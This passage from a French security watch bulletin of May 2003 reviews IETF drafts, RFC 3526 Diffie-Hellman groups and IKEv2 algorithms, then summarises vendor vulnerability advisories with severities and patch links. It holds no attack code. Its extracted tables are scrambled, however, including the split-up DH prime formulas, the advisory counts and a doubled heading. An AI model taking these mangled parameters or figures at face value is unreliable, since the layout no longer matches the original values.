RDMA Protocol Verbs Specification
Introduction to the RMON Family of MIB Modules
Compact Forward Error Correction (FEC) Schemes
SigComp User Guide
SigComp Torture Tests
Implementer's Guide for SigComp
Generic Threats to Routing Protocols
RPSLng
RSVP-TE Ext. in support of End-to-End GMPLS-based Recovery
GMPLS RSVP-TE Signalling in support of ASON
Extended RTP Profile for RTCP-based Feedback(RTP/AVPF)
RTP Payload Format for MIDI
RTP Control Protocol Extended Reports (RTCP XR)
SCTP Partial Reliability Extension
Stream Control Transmission Protocol (SCTP) Bakeoff Scoring
Load Sharing in Stream Control Transmission Protocol
Session Description Protocol (SDP) Source Filters
SDP: Session Description Protocol
RTCP attribute in SDP
SDPng Transition
A Transport Independent Bandwidth Modifier for SDP
SDXP: Structured Data Exchange Protocol
Mobility Related Terminology
On the use of a Service Identifier in Packet Headers
Sieve: Vacation Extension
ISDN Q.921-User Adaptation Layer
Page 26/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
SIMPLE
SIP
SLP
SMS
SMTP
SNMPV3
SPAM
SPEECHS
SSM
TCP
TFTP
ULE
URN
VPN
VRRP
WEBDAV
XMPP
draft-lonnfors-simple-partial-notify-01
draft-khartabil-simple-filter-format-00
draft-khartabil-simple-filter-funct-00
draft-ietf-simple-presinfo-deliv-reg-00
draft-ietf-simple-winfo-filter-reqs-00
draft-ietf-simple-event-list-03
draft-ietf-sip-scvrtdisco-04
draft-ietf-sipping-req-history-03
draft-ietf-sipping-conferencing-framework-00
draft-zhao-slp-attr-02
draft-wilde-sms-service-04
draft-wilde-sms-uri-04
draft-ietf-fax-esmtp-conneg-07
draft-ietf-snmpv3-coex-v2-04
draft-crocker-spam-techconsider-01
draft-fecyk-dsprotocol-02
draft-shanmugham-speechsc-00
draft-ietf-ssm-overview-05
draft-ietf-ssm-arch-03
draft-floyd-newreno-00
draft-lear-tftp-uri-04
draft-fair-ipdvb-ule-00
draft-allen-newsml-urn-rfc3085bis-00
draft-rosen-ppvpn-l2-signaling-03
draft-kompella-ppvpn-vpls-02
draft-andersson-ppvpn-terminology-03
draft-sodder-ppvpn-vhls-02
draft-ietf-ppvpn-l2vpn-requirements-00
draft-ietf-vrrp-spec-v2-07
draft-ietf-vrrp-ipv6-spec-04
draft-ietf-webdav-ordering-protocol-08
draft-ietf-xmpp-im-11
draft-ietf-xmpp-core-12
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
20/05
20/05
20/05
06/05
09/05
19/05
14/05
15/05
01/05
28/04
15/05
15/05
19/05
06/05
19/05
28/04
22/05
01/05
08/05
12/05
16/05
20/05
21/05
06/05
15/05
30/04
29/04
02/05
21/05
21/05
12/05
05/05
05/05
Partial Notification of Presence Information
XML Based Format for Event Notification Filtering
Functional Description of Event Notification Filtering
Requirements for Efficient Delivery of Presence Information
Requirements for Filtering of Watcher Information
A SIP Event Notification Extension for Resource Lists
SIP Ext. Header Field for Service Route Discovery During Registr.
SIP Generic Request History Capability – Requirements
A Framework for Conferencing with the Session Initiation Protocol
Enabling Global Service Attributes in the Service Location Protocol
Registration of GSTN SMS Service Qualifier
URI scheme for GSM Short Message Service
SMTP Service Extension for Fax Content Negotiation
Coexistence between V1, V2 & V3 of the Internet SNM Framework
Technical Considerations for Spam Control Mechanisms
A Way to Identify Hosts Authorized to Send SMTP Traffic
A SPEECHSC protocol for Media Resource Control
An Overview of Source-Specific Multicast(SSM)
Source-Specific Multicast for IP
The NewReno Modification to TCP's Fast Recovery Algorithm
URI Scheme for the TFTP Protocol
ULE for transmission of IP datagrams over MPEG-2/DVB networks
URN Namespace for NewsML Resources
Provisioning Models and Endpoint Identifiers in L2VPN Signaling
Virtual Private LAN Service
PPVPN Terminology
Virtual Hierarchical LAN Services
Service Reqs for L2 Provider Provisioned Virtual Private Networks
Virtual Router Redundancy Protocol
Virtual Router Redundancy Protocol for IPv6
WebDAV Ordered Collections Protocol
XMPP Instant Messaging
XMPP Core
Page 27/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
NOS COMMENTAIRES
LES RFC
RFC 3526
More Modular Exponential (MODP) Diffie-Hellman groups for Internet Key Exchange (IKE)
Les standards RFC2412 (‘The OAKLEY Key Determination Protocol’) et RFC2409 (‘The Internet Key
Exchange’) décrivent les mécanismes permettant à deux entités d’établir un secret commun sur un support non
protégé, et ce à partir de la seule connaissance de paramètres caractéristiques des schémas d’échange employés, les
valeurs de ces paramètres pouvant être rendues publiques.
Parmi les schémas proposés, le schéma ‘Diffie-Hellman’ ou ‘DH’, synthétiquement présenté sur le diagramme
d’échange suivant, permet d’assurer une ‘mise à la clef’ à partir de la seule connaissance d’un couple de
paramètres : ‘n’ un nombre premier et ‘g’ un générateur de ‘n’.
1- Alice et Bob conviennent du choix du couple
(n,g)
en
respectant
certaines
conditions
mathématiques
2- Alice sélectionne une valeur secrète ‘a’
et
calcule sa clef publique A=gamod(n)
3- Bob sélectionne sa valeur secrète ‘b’ et calcule
aussi sa clef publique B=gbmod(n)
4- Alice et Bob échangent leur clef publique sur un
quelconque canal
5- Alice calcule le secret partagé ‘K’ en effectuant
l’opération K= Ba = gbamod(n)
6- Bob calcule lui aussi le secret partagé ‘K’ en
effectuant l’opération K= Ab = gabmod(n)
On notera que depuis son invention en 1976, ce schéma a fait ses preuves et est aujourd’hui couramment utilisé par
de nombreux protocoles de transmission sécurisés dont ‘SSH’, ‘SSL’ et ‘IPSec’. Rappelons cependant qu’il n’assure
aucunement l’authentification des correspondants et est de fait sensible aux attaques de type ‘man-in-the-middle’.
La mise en œuvre pratique du schéma ‘DH’ - et plus largement des protocoles supportés par ‘OAKLEY’ et ‘IKE’ –
requiert que l’ensemble des intervenants aient connaissance du couple ‘(n,g)’. Ce couple de paramètres peut
parfaitement être généré localement et diffusé au groupe sous réserve de respecter les contraintes mathématiques
qui pèsent sur le choix de ces valeurs. En pratique et pour des raisons évidentes de mise en œuvre dans le cas
d’équipements de communication, on préférera généralement utiliser des valeurs ‘bien connues’ générées dans les
règles de l’art et ‘pré-encodées’ dans les équipements.
Au-delà de l’intérêt purement opérationnel de cette démarche, la spécification d’une structure de données générique
- dénommée ‘groupe’ - autorise l’adaptation du protocole de mise à la clef aux exigences de sécurité et au contexte
associé en autorisant la sélection du schéma – DH, ECC, …- et de la taille des clefs générées.
Sont ainsi actuellement définis les 8 groupes Diffie-Hellman suivants:
Référence
RFC2409
RFC2409
RFC3526
RFC3526
RFC3526
RFC3526
RFC3526
RFC3526
N° Opération
1 MODN
2 MODN
Taille
768
1024
‘n’
2^ 768 - 2^ 704 - 1 + 2^64 * {[2^ 638 pi] +
2^1024 - 2^ 960 - 1 + 2^64 * {[2^ 894 pi] +
149686}
129093}
‘g’
2
2
1536
2^1536 - 2^1472 - 1 + 2^64 * {[2^1406 pi] +
741804}
2
2048
3072
4096
6144
8192
2^2048
2^3072
2^4096
2^6144
2^8192
+ 124476}
+ 1690314}
+ 240904}
+ 929484}
+ 4743158}
2
2
2
2
2
5 MODN
14
15
16
17
18
MODN
MODN
MODN
MODN
MODN
-
2^1984
2^3008
2^4032
2^6080
2^8128
-
1
1
1
1
1
+
+
+
+
+
2^64
2^64
2^64
2^64
2^64
*
*
*
*
*
{[2^1918
{[2^2942
{[2^3966
{[2^6014
{[2^8062
pi]
pi]
pi]
pi]
pi]
Aux deux groupes définis dans le RFC d’origine viennent s’ajouter 6 nouveaux groupes permettant d’anticiper le
problème de l’augmentation régulière de la taille des clefs de session. En effet, la taille maximale de la clef partagée
– et donc la ‘robustesse’ du chiffrement - sera principalement déterminée par la taille du paramètre ‘n’ intervenant
dans l’opération modulaire.
Ces nouveaux groupes seront très certainement rapidement intégrés par les éditeurs et équipementiers dans leurs
prochaines versions de logiciels et de ‘firmwares’, le groupe 5 étant encodé depuis quelques temps déjà dans de
nombreux équipements de télécommunication et logiciels assurant la création de ‘VPN’.
ftp://ftp.isi.edu/in-notes/rfc3526.txt
http://www.ietf.org/rfc/rfc2412.txt
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 28/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
LES DRAFTS
DRAFT-IAB-AUTH-MECH-00
A Survey of Authentication Mechanisms
En juillet 2002, E.Rescorla consultant de la société ‘RTFM Inc.’ et auteur de l’ouvrage ‘SSL and TLS: Designing
and Building Secure Systems’ nous proposait un excellent état de l’art en matière de techniques d’authentification
sous la référence ‘draft-rescorla-auth-mech-00.txt’ (Rapport N°48 – Juillet 2002). Une mise à jour de cet état de
l’art vient d’être publiée mais, cette fois-ci, au sein du groupe de travail ‘IAB’ (Internet Advisory Board).
Bien qu’encore incomplet, ce document de travail aborde de manière très structurée les 7 principaux mécanismes
d’authentification s’appuyant sur la connaissance d’une information ou la possession d’un élément secret. Le cas
particulier des mécanismes basés sur une caractéristique individuelle – authentification dite ‘biométrique’ – n’est
cependant toujours pas traité.
Sont ainsi étudiés les mécanismes suivants :
1. Mots de passe en clair
2. Mots de passe jetables
3. Schémas ‘défi / réponse’
4. Schémas à échange de clefs dit ‘DH’
5. Schémas dit ‘à apport de connaissance nul’
6. Schémas à base de certificats et mots de passe
7. Schémas d’authentification mutuelle à base de clefs publiques
Chaque mécanisme fait l’objet d’un chapitre rappelant le principe de fonctionnement sous-jacent, exposant les
différents risques associés mais aussi – et c’est une nouveauté – les services de l’Internet utilisant ce mécanisme.
Lorsque cela est possible, une étude de cas s’appuyant sur une implémentation connue est proposée.
Le modèle de description suivant est ainsi systématiquement utilisé:
A Le mécanisme
(Description)
A.x
A.y
Un risque
(Description et Contre-mesures)
"
"
A.z
Une étude de cas: Protocole(s) spécifique(s) (Description du protocole)
A.z.x
Les problèmes spécifiques à ce(s) protocole(s)
A.w
Une liste des protocoles/systèmes utilisant ce mécanisme
La table des matières de cet état de l’art est présentée ci-dessous, les différences entres les deux versions étant
mises en évidence en caractères soulignés:
1
Introduction
2
The Authentication Problem
2.1 Authorization vs. Authentication
2.2 Something you have, something you know
3
Description of Authentication Mechanisms
4
Passwords In The Clear
4.1 Password Sniffing
4.2 Post-Authentication Hijacking
4.3 Online Password Guessing
4.4 Offline Dictionary Attack
4.5 Case Study: HTTP Basic Authentication
4.6 List of Systems that Use Passwords in the Clear
5
One Time Passwords
5.1 Case Study: S/Key and OTP
5.2 Case Study: SecureID
5.3 List of One-Time Password Systems
6
Challenge/Response
6.1 Offline Attacks on Challenge/Response
6.2 Password File Compromise
6.3 Case Study: CRAM-MD5
6.4 Case Study: HTTP Digest
6.5 Case Study: SSL Session Resumption
6.5 List of Challenge-Response Systems
Anonymous Key Exchange
7.1 Case Study: SSH Password Authentication
7.2 Case Study: TLS Anonymous DH + Passwords
7.3 List of Anonymous Key Exchange Mechanisms
7
8
Zero-Knowledge Password Proofs
8.1 Intellectual Property
8.2 List of Zero Knowledge Password Proof Systems
9
Server Certificates plus Client Authentication
9.1 Case Study: Passwords over HTTPS
9.2 List of Server Certificate Systems
10
Mutual Public Key Authentication
10.1 Password Equivalence
10.2 Authentication between Unknown Parties
10.3 Key Storage
10.4 Tokens
10.5 Password Derived Keys
10.6 Case Study: SMTP over TLS
10.7 List of Mutual Public Key Systems
11
Generic Authentication Mechanisms
11.1 Downgrade Attacks
11.2 Integration with Applications
11.3 Multiple Equivalent Mechanisms
11.4 Excessive Layering
11.5 List of Generic Authentication Systems
12
Sharing Authentication Information
12.1
Authentication Services
12.2
Single Sign-On
12.3. Case Study: RADIUS
12.4. Case Study: Kerberos
12.5. List of Authentication Server Systems
13
Guidance for Protocol Designers
13.1
Know what you're trying to do
13.2
Use As Few Mechanisms as You Can
13.3
Avoid simple passwords
13.4
Avoid inventing something new
13.5
Use the strongest mechanisms you can
13.6
Consider providing message integrity
14
Scenarios
14.1
Capability Considerations
14.2
Architectural Considerations
Si les paragraphes ‘§5.2’ et ‘§6.5’ ont été complétés par rapport à la version précédente, les paragraphes ‘§2.2’,
‘§7.2’, ‘§10.6’, ‘§11.2’, ‘§12.3’ ne sont toujours pas écrits.
Bien que n’étant pas d’accord avec la classification employée laquelle fait apparaître une certaine confusion entre
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 29/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
mécanismes et schémas, protocoles et implémentations, nous pouvons que saluer le remarquable travail de synthèse
réalisé par l’auteur et confirmer l’importance des règles de conception simples et efficaces exprimées dans le chapitre
13.
ftp://ftp.nordu.net/internet-drafts/draft-iab-auth-mech-00.txt
DRAFT-IETF-IPSEC-IKEV2-ALGORITHMS-00
Cryptographic Algorithms for use in the Internet Key Exchange Version 2
Le standard RFC2409 (‘IKE - The Internet Key Exchange’) et la proposition de norme (‘IKE V2’) définissent les
mécanismes permettant l’échange des éléments cryptographiques nécessaires à l’établissement d’un canal IPSec
sécurisé entre 2 entités ne partageant aucun secret préalable.
L’existence de multiples implémentations et la généricité des mécanismes proposés conduit l’IETF à imposer un
cadre commun afin de faciliter l’interopérabilité de ces implémentations, notamment vis à vis des travaux de
spécification de la nouvelle version d’IKE.
Le document intitulé ‘Cryptographic Algorithms for use in the Internet Key Exchange Version 2’ décrit ainsi
les options d’implémentation et de configuration devant impérativement être proposées par les produits utilisant ‘IKE
V2’.
Charge : Chiffrement
Obligatoire
AES-128-CBC
Charge : Intégrité
Obligatoire
HMAC-SHA1
Clefs : Groupes DH
Optionnel
Recommandé
Optionnel
Optionnel
Obligatoire
N°1
N°2
N°3
N°4
N°5
768
1024
1024
1024
1024
bits
bits
bits
bits
bits
DH
DH
ECC
ECC
DH
Transport : Chiffrement
Optionnel
Optionnel
Optionnel
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Obligatoire
Optionnel
N°1
N°2
N°3
N°4
N°5
N°6
N°7
N°8
N°9
N°10
N°11
N°12
N°13
ENCR_DES_IV64
ENCR_DES
ENCR_3DES
ENCR_RC5
ENCR_IDEA
ENCR_CAST
ENCR_BLOWFISH
ENCR_3IDEA
ENCR_DES_IV32
ENCR_RC4
ENCR_NULL
ENCR_AES_128_CBC
ENCR_AES_128_CTR
Transport : Génération d’aléa
Optionnel
Obligatoire
Recommandé
Recommandé
N°1
N°2
N°3
N°4
PRF_HMAC_MD5
PRF_HMAC_SHA1
PRF_HMAC_TIGER
PRF_AES128_CBC
Transport : Intégrité
Optionnel
N°1
AUTH_HMAC_MD5_96
Recommandé
N°2
AUTH_HMAC_SHA1_96
Optionnel
N°3
AUTH_DES_MAC
Optionnel
N°4
AUTH_KPDK_MD5
Obligatoire
N°5
AUTH_AES_XCBC_96
ftp://ftp.nordu.net/internet-drafts/draft-ietf-ipsec-ikev2-algorithms-00.txt
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 30/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
ALLEER
RT
TE
ES
SE
ET
T AT
TT
TA
AQ
QU
UE
ES
S
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
# Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
# Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d’un synoptique
résumant les caractéristiques de chacune des sources d’information ainsi que les relations existant entre
ces sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel
et publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
Systèmes
Avis Généraux
Editeurs
Systèmes
Indépendants
Editeurs
Hackers
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
3Com
Compaq
Linux
Microsoft
l0pht
AXENT
BugTraq
CERT
Cisco
HP
FreeBSD
Netscape
rootshell
ISS
@Stake
CIAC
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
# Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
# Maintenance des systèmes :
Lecture des avis constructeurs associés
# Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
Cisco
HP
Netscape
BugTraq
rootshell
AXENT
NetBSD
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 31/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
FORMAT DE LA PRESENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit :
%
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Informations concernant la plate-forme impactée
Gravité
Date
Produit visé par la vulnérabilité
Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
%
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d’information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 24/04/2003 au 28/05/2003
Période
14
Organisme
CERT-CA
0
CERT-IN
0
CIAC
14
30
Constructeurs
Cisco
4
HP
8
IBM
1
SGI
4
Sun
13
Editeurs
2
Macromedia
0
Microsoft
2
Netscape
Sco
0
37
Unix libres
Linux RedHat
13
Linux Debian
12
Linux Mandr.
10
FreeBSD
2
1
Autres
@Stake
1
eEye
0
X-Force
0
Cumul
2003 2002
74
165
13
36
0
7
61
122
137
220
9
39
45
99
5
13
22
61
56
8
30
127
4
13
17
72
0
2
9
40
227
349
62
102
95
120
60
85
10
42
16
44
10
9
1
13
5
22
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Cumul 2003- Constructeurs
Cisco
7%
Sun
40%
SGI
16%
HP
33%
IBM
4%
Cumul 2003 - Editeurs
Sco
30%
Cumul 2002 - Constructeurs
SGI
28%
Cisco
18%
IBM
6%
HP
44%
Cumul 2002 - Editeurs
Sco
31%
Macromedia
13%
Netscape
0%
Sun
4%
Macromedia
10%
Netscape
2%
Microsoft
57%
Microsoft
57%
Page 32/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
ALERTES DETAILLEES
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s’il y en a, doivent
immédiatement être appliqués.
ADOBE
Vulnérabilité dans Acrobat
Un défaut dans l'implémentation Javascript d'Acrobat provoque l'exécution de code arbitraire par un fichier piégé.
Moyenne 13/05 Adobe Acrobat 5 pour Windows
Ecriture de fichiers dans le répertoire de stockage des plug-ins
Correctif existant Javascript
http://www.adobe.com/support/downloads/detail.jsp?ftpID=2121
Adobe
CERT VU#184820 http://www.kb.cert.org/vuls/id/184820
BEA
Défaut de validation de certificats par WebLogic
WebLogic et Tuxedo effectuent une validation incomplète des certificats qui leur sont présentés.
Forte
12/05 BEA Tuxedo 8.0 et 8.1, WebLogic Entreprise 5.0.1 et 5.1, WebLogic Server et Express 5.1, 6.1, 7.0 et 7.0.0.1
Vérification laxiste
Correctif existant Vérification certificats clients
http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-31.jsp
BEA03-31.00
Stockage des mots de passe accessibles dans WebLogic
Plusieurs mots de passe utilisés par WebLogic sont stockés en clair et peuvent être lus par un utilisateur ayant
accès au serveur.
Moyenne 12/05 BEA WebLogic 7.0 et 7.0.0.1
Stockage non sécurisé des mots de passe
Correctif existant WebLogic
http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-30.jsp
BEA03-30.00
CISCO
Déni de service par la fonction 'SAA'
Il est possible de provoquer un déni de service contre les routeurs sur lesquels la fonction 'Service Assurance Agent'
(anciennement 'Response Time Reporter') est activée.
Forte
16/05 Cisco IOS 12.0S, SC, ST, SL, SP, SXCisco IOS 12.1, E, EA, EC, EX, EY, Cisco IOS 12.2, DA, S
Non disponible
Correctif existant Service 'SAA'
http://www.cisco.com/warp/public/707/cisco-sa-20030515-saa.shtml
CSCdx17916
CSCdx61997
Déni de service dans CSS 11000 et 11500
Les commutateurs CSS 11000 et 11500 sont vulnérables à un déni de service.
Forte
01/05 Cisco CSS 11000 et 11500 avec WebNS
Mauvaise réponse à des requêtes DNS
Correctif existant WebNS
http://www.cisco.com/warp/public/707/cisco-sa-20030430-dns.shtml
CSCdz62499
CSCea36989
CERT VU#714121 http://www.kb.cert.org/vuls/id/714121
Mauvaise gestion des requêtes FTP et Telnet via ONS
Une mauvaise gestion des requêtes FTP et Telnet par ONS permet de provoquer une remise à zéro des cartes de
contrôle.
Forte
01/05 Cisco ONS15454 avec ONS 3.0 à 3.4.1Cisco ONS15327 et ONS15454SDH avec ONS 3.3 à 3.4.1Cisco
Palliatif proposé
CSCdz83515
CSCdz83519
ONS15600 avec ONS 1.0
ONS Software
Mauvaise gestion des requêtes FTP et Telnet
http://www.cisco.com/warp/public/707/cisco-sa-20030501-ons.shtml
Multiples vulnérabilités des concentrateurs VPN 3000
Plusieurs vulnérabilités affectent les concentrateurs VPN 3000.
Forte
07/05 Cisco VPN 3000 (modèles 3005, 3015, 3030, 3060, 3080), Cisco VPN 3002 Hardware Client
Concentrateurs VPN 3000
1 - Mauvaise gestion de 'IPSec over TCP'
Palliatif proposé
CSCea77143
CSCdz15393
CSCdt84906
2 - Mauvaise gestion des paquets SSH
3 - Mauvaise gestion des paquets ICMP
http://www.cisco.com/warp/public/707/cisco-sa-20030507-vpn3k.shtml
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 33/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
ETHEREAL
Débordements de buffer dans Ethereal
De nouveaux débordements de buffer dans différents dissecteurs d'Ethereal ont été découverts.
Critique 01/05 Ethereal 0.9.11 et précédents
Débordements de buffer
Correctif existant Divers dissecteurs
http://www.ethereal.com/appnotes/enpa-sa-00009.html
enpa-sa-00009
GnuPG
Mauvaise indication de validité de clé
Les clés liées à plusieurs identités indiquent pour toutes les identités un niveau de confiance correspondant à
l'identité dont le niveau de confiance est le plus élevé.
Faible
20/05 GnuPG 1.2.1 et précédents
Mauvaise vérification de la validité de la clé pour une identité
Correctif existant GnuPG
RHSA-03:175-06 https://rhn.redhat.com/errata/RHSA-2003-175.html
CERT VU#397604 http://www.kb.cert.org/vuls/id/397604
http://lists.gnupg.org/pipermail/gnupg-announce/2003q2/000268.html
GnuPG
HP
Vulnérabilité dans 'rexec'
Le programme 'rexec' peut être utilisé pour provoquer l'exécution de code arbitraire.
Forte
29/04 HP-UX 10.20 et 11.00
Exécution de code non sollicité
Correctif existant Programme 'rexec'
http://europe-support2.external.hp.com/atq/bin/doc.pl/
HPSBUX0304-257
Vulnérabilité locale dans 'wall'
Le programme 'wall' contient une vulnérabilité localement exploitable.
Forte
06/05 HP HP-UX 10.20, 11.00 et 11.11
Non disponible
Correctif existant 'wall'
HPSBUX0305-258 http://europe-support2.external.hp.com/atq/bin/doc.pl/?CERTDOCID=HPSBUX0305-258
Vulnérabilité dans 'kermit'
Une vulnérabilité dans 'kermit' permet une augmentation de privilèges.
Forte
18/05 HP HP-UX 10.20 et 11.00
Programme 'kermit'
Débordement de buffer
Palliatif proposé
HPSBUX0305-259 http://europe-support2.external.hp.com/atq/bin/doc.pl/CERTDOCID=HPSBUX0305-259
Vulnérabilité dans 'ipcs'
Le programme 'ipcs' contient un débordement de buffer exploitable par un utilisateur local.
Forte
19/05 HP HP-UX 11.00
Débordement de buffer
Correctif existant Programme 'ipcs'
HPSBUX0305-260 http://europe-support2.external.hp.com/atq/bin/doc.pl/CERTDOCID=HPSBUX0305-260
Vulnérabilité dans 'dupatch' et 'setld'
Une vulnérabilité de type lien symbolique affecte 'dupatch' et 'setld' sur HP Tru64 UNIX.
Forte
01/05 HP Tru64 UNIX 5.1 PK6, 5.1A PK4, 5.1B PK1 et inférieurs, HP Tru64 UNIX 5.0A PK3 et inférieurs,
Palliatif proposé
SSRT3471
HP Tru64 UNIX 4.0F PK7, 4.0G PK3 et inférieurs
'dupatch' et 'setld'
Lien symbolique
http://www.tru64.org/stories.php?story=03/04/28/9781100
HTTP
Vulnérabilité dans la méthode 'TRACE'
La méthode HTTP 'TRACE' permet d'obtenir des informations liées aux requêtes HTTP clientes.
Moyenne 02/05 Sun ONE/iPlanet Web Server 4.1 SP1 à SP12 et 6.0 SP1 à SP5, Apache HTTP Server,
Palliatif proposé
CERT VU#867593
Sun 50603
Microsoft Internet Information Services (IIS)
Méthode HTTP 'TRACE'
Accès aux entêtes HTTP
http://www.kb.cert.org/vuls/id/867593
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/50603
IBM
Vulnérabilité du système d'impression
Les programmes gérant les mécanismes d'AIX contiennent une vulnérabilité exploitable localement.
Forte
13/05 IBM AIX 4.3, 5.1 et 5.2
Vulnérabilité de formatage de chaîne de caractères
Correctif existant Mécanisme d'impression
http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/MSS-OAR-E01-2003.0660.1
E01-2003:0660
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 34/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
LINUX DEBIAN
Vulnérabilité dans le paquetage 'leksbot'
Le programme 'leksbot' est incorrectement installé setuid root.
Forte
06/05 Paquetages 'leksbot' inférieurs au 1.2-3.1 ou au 1.2-5
Présence de la permission setuid root
Correctif existant Paquetage 'leksbot'
http://www.debian.org/security/2003/dsa-299
DSA-299-1
Acquisition de privilèges via le paquetage 'fuzz'
Une faille de l'outil 'fuzz' permet d'acquérir les privilèges d'autres utilisateurs.
Moyenne 09/05 Debian Linux 3.0 (woody)
Création non sécurisée de fichiers temporaires
Correctif existant Paquetage 'fuzz'
http://www.debian.org/security/2003/dsa-302
DSA-302-1
Vulnérabilité dans 'lv'
Il est possible de piéger un utilisateur de 'lv' pour qu'il exécute du code choisi par l'attaquant.
Moyenne 15/05 'lv', sur Debian paquetages inférieurs au 4.49. 4-7woody2, 4.49. 3-4potato2 ou au 4.49.5-2
Lecture de fichier de configuration dans le répertoire courant
Correctif existant Utilitaire 'lv'
http://www.securityfocus.com/advisories/5387
DSA-304-1
Vulnérabilité dans les scripts fournis avec Sendmail
Certains scripts inclus par Debian dans le paquetage Sendmail contiennent une vulnérabilité exploitable localement.
Moyenne 15/05 Debian utilisant un paquetage Sendmail inférieurs aux8.12.3-6.4, 8.9.3-26.1 et 8.12.9-2
Création dangereuse de fichiers temporaires
Correctif existant 'expn', 'checksendmail' et
DSA-305-1
'doublebounce.pl'
http://www.securityfocus.com/advisories/5389
LINUX REDHAT
Vulnérabilité dans le module Apache 'mod_auth_any'
Le module 'mod_auth_any' fourni par Red Hat contient une faille permettant de provoquer l'exécution de code non
sollicité.
Critique 05/05 Red Hat 7.2 et 7.3
Mauvais échappement des données utilisateurs
Correctif existant Module 'mod_auth_any'
RHSA-03:113-13 https://rhn.redhat.com/errata/RHSA-2003-113.html
Vulnérabilités diverses dans le noyau
Deux vulnérabilités distinctes ont été découvertes dans le noyau 2.4 de Linux.
Forte
14/05 Noyau 2.4.20 et précédents, Red Hat 7.1 à 9
Erreurs d'implémentation
Correctif existant Noyau système
http://www.ciac.org/ciac/bulletins/n-096.shtml
CIAC N-096
RHSA-03:172-23 https://rhn.redhat.com/errata/RHSA-2003-172.html
Exécution d'un programme via 'man'
Un programme nommé 'unsafe' peut s'exécuter via 'man'.
Faible
02/05 Red Hat Linux 7.1, 7.2, 7.3 et 8.0'man' inférieur à 1.51
Mauvais traitement d'un fichier
Correctif existant Programme 'man'
RHSA-03:133-05 https://rhn.redhat.com/errata/RHSA-2003-133.html
MICROSOFT
Deux vulnérabilités dans les serveurs BizTalk
Deux vulnérabilités affectent les serveurs Microsoft BizTalk.
Critique 30/04 Microsoft BizTalk Server 2000 et 2002
1 - Débordement de buffer
Correctif existant 1 - HTTP receiver
MS03-016
2 - DTA
2 - Mauvais filtrage des URLs
http://www.microsoft.com/technet/security/bulletin/MS03-016.asp
Exécution de programmes malicieux via Media Player
Une faille dans Windows Media Player permet l'exécution de programmes malicieux.
Critique 08/05 Microsoft Windows Media Player 7.1, Media Player 8.0 (pour Windows XP)
Non validation des URLs
Correctif existant Téléchargement des 'skins'
http://www.microsoft.com/technet/security/bulletin/MS03-017.asp
MS03-017
http://www.solutions.fi/index.cgi/news_2003_05_07?lang=eng
OnlineSolutions
